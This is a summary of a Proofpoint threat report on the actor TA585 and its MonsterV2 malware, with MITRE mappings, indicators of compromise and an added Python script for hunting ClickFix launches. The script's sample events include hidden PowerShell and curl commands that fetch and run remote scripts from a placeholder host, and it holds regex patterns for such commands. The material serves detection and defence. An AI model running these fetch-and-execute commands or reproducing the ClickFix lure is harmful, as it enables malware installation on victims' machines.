When the monster bytes: tracking TA585 and its arsenal

Proofpoint researchers identified TA585, a cybercriminal actor that manages its own infrastructure and delivery to install third-party malware such as MonsterV2, which acts as a RAT, stealer, and loader. The report details TA585’s ClickFix web-inject delivery, GitHub notification lures, SonicCrypt crypter usage, and multiple MonsterV2 indicators including file hashes and C2 IPs. #TA585 #MonsterV2

Key points

  • Proofpoint named a sophisticated cybercriminal actor, TA585, that operates end-to-end: registering domains, hosting infrastructure (Cloudflare), filtering victims, and delivering malware.
  • TA585 commonly uses ClickFix web-injects on compromised legitimate websites to present fake CAPTCHA/verification that instructs users to run Win+R / PowerShell commands to fetch MonsterV2 or other payloads.
  • MonsterV2 is a commercially advertised malware (RAT/stealer/loader) observed in campaigns since Feb 2025 and used by multiple cybercriminal customers, not authored by TA585.
  • MonsterV2 capabilities include infostealing (browsers, wallets, tokens), HVNC, webcam recording, clipboard clippers, remote command execution, and downloading additional payloads; it intentionally avoids infecting CIS countries.
  • TA585 also uses social engineering via GitHub notification lures and shortened URLs to redirect targets to actor-controlled sites that perform the same ClickFix-style checks and delivery.
  • MonsterV2 configurations and communications use ChaCha20 encryption and Zlib compression; initial C2 check-in includes detailed system metadata and supports large, compressed C2 responses with many commands.
  • SonicCrypt, a commercial crypter observed packing MonsterV2, performs anti-analysis checks, adds Defender exclusions or autostart in some builds, and drops decrypted payloads executed via the Task Scheduler.

MITRE Techniques

  • [T1566] Phishing – TA585 sent emails impersonating US government agencies (IRS, SBA) and used GitHub notification lures to deliver URLs leading to malicious ClickFix pages (“…IRS themed lures… Messages contained URLs linking to a PDF which would open in the browser. The PDF linked to a webpage that was using the ClickFix technique…”).
  • [T1204] User Execution – ClickFix social engineering coerced users to run PowerShell/Win+R commands manually to download and execute MonsterV2 (“…which lures visitors to manually run a malicious command in the Windows Run-box or PowerShell terminal…”).
  • [T1189] Drive-by Compromise – TA585 compromised legitimate websites with JavaScript injections to serve malicious overlays and filter victims before delivering payloads (“…websites have been compromised with a malicious JavaScript injection. This injection causes the website to load a malicious script…”).
  • [T1105] Ingress Tool Transfer – PowerShell commands downloaded and executed secondary scripts and ultimately MonsterV2 on victim hosts (“…copied and pasted the PowerShell script as instructed, it executed a second PowerShell script ultimately leading to MonsterV2.”).
  • [T1059] Command and Scripting Interpreter – Malware and delivery used PowerShell commands and arbitrary command line execution to fetch and run payloads (“…initiated a PowerShell command that downloads and executes malware…”).
  • [T1041] Exfiltration Over C2 Channel – MonsterV2 collects system and user data, then sends base64-encoded, ChaCha20-encrypted, and Zlib-compressed data to C2 servers (“…sent the following information… stored in stack memory as a structure and then later base-64 encoded and sent to the C2 server.”).
  • [T1071] Application Layer Protocol – MonsterV2 uses raw TCP sockets with custom encryption (ChaCha20 and key exchange) for communication with C2 (“…a raw TCP connection is used with a small add-on on top in the form of an exchange of encryption keys with two-way authentication…”).
  • [T1106] Native API – MonsterV2 resolves and calls Windows API functions dynamically after decrypting API name strings (“…decrypts and resolves several Windows API functions it requires. Each library and function name string is decrypted…”).
  • [T1543] Create or Modify System Process – SonicCrypt and MonsterV2 use the Task Scheduler to execute dropped payloads and achieve persistence (“…the payload is executed using the task scheduler.”).
  • [T1497] Virtualization/Sandbox Evasion – SonicCrypt and MonsterV2 perform environment checks and optional anti-sandbox / anti-debugging behaviors before decryption/execution (“…Runs initial evasion and environment checks… Checking amount of RAM… checks the infected systems’ BIOS manufacturer…”).
  • [T1562] Impair Defenses – SonicCrypt can add the dropped executable to Windows Defender exclusions and support UAC bypass, reducing detection and prevention (“…Support for adding your file to Windows Defender exceptions… the crypt supports the ability to bypass UAC…”).
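The ClickFix chain described under T1204, T1059 and T1105 (an interpreter launched from the Run box that fetches and executes a remote script) can be hunted for in process-creation telemetry. The script below is an added defender-side example, not code from the Proofpoint report; the event format, the sample events and the indicator regexes are all constructed assumptions, and the scoring threshold is a tunable guess.

```python
import re

# Constructed sample of process-creation events in a simplified
# "parent_image|image|command_line" form (not telemetry from the report).
SAMPLE_EVENTS = [
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://example.invalid/a | iex"',
    'explorer.exe|powershell.exe|powershell -NoProfile -c "Get-Date"',
    'cmd.exe|powershell.exe|powershell -File C:\\ops\\backup.ps1',
    'explorer.exe|cmd.exe|cmd /c "curl http://example.invalid/b -o %TEMP%\\b.ps1"',
]

# Assumed traits of a ClickFix launch: a Win+R command shows explorer.exe as
# the parent of the interpreter, and the command pulls something remote
# and runs it. Win+R history is also kept in HKCU\...\Explorer\RunMRU,
# which is worth pulling during triage of a suspected host.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
FETCH_RE = re.compile(r"(invoke-webrequest|\biwr\b|downloadstring|net\.webclient|\bcurl\b)", re.I)
EXEC_RE = re.compile(r"(invoke-expression|\biex\b)", re.I)
URL_RE = re.compile(r"https?://", re.I)


def parse_event(line):
    """Split one constructed event into (parent, image, command_line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent.lower(), image.lower(), cmdline


def clickfix_score(line):
    """Return (score, reasons); 0 means no ClickFix-like trait was seen."""
    parent, image, cmdline = parse_event(line)
    reasons = []
    if image in INTERPRETERS and parent == "explorer.exe":
        reasons.append("interpreter launched from explorer.exe (Run-box style)")
    if FETCH_RE.search(cmdline):
        reasons.append("remote fetch primitive in command line")
    if URL_RE.search(cmdline):
        reasons.append("URL in command line")
    if EXEC_RE.search(cmdline):
        reasons.append("in-memory execution of fetched content")
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=3):
    """Return (event, reasons) for events with at least `threshold` traits."""
    hits = []
    for line in events:
        score, reasons = clickfix_score(line)
        if score >= threshold:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for event, why in find_clickfix_candidates(SAMPLE_EVENTS):
        print(event, "->", "; ".join(why))
```

A single trait (an admin running PowerShell from the Run box) is routine, which is why the score requires several traits together before an event is surfaced.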

Indicators of Compromise

  • [File Hash] MonsterV2 sample hashes – ccac0311b3e3674282d87db9fb8a151c7b11405662159a46dda71039f2200a67, 666944b19c707afaa05453909d395f979a267b28ff43d90d143cd36f6b74b53e (and 11 more hashes listed in the report).
  • [IP Address] MonsterV2 C2 servers – 139.180.160[.]173, 155.138.150[.]12 (additional C2 IPs include 83.217.208[.]77, 91.200.14[.]69, etc.).
  • [Domain] TA585 infrastructure and injects – intlspring[.]com used in web-inject campaigns; actor-controlled redirect domains used with ClickFix overlays.
  • [Port] C2 communication – common MonsterV2 C2 port 7712 across multiple samples and IPs.
  • [File Name] SonicCrypt dropper naming convention – typical dropped payload names such as WinHealth.exe and WindowsSecurity.exe, used by the crypter when writing the decrypted payload to disk.

Read more: https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal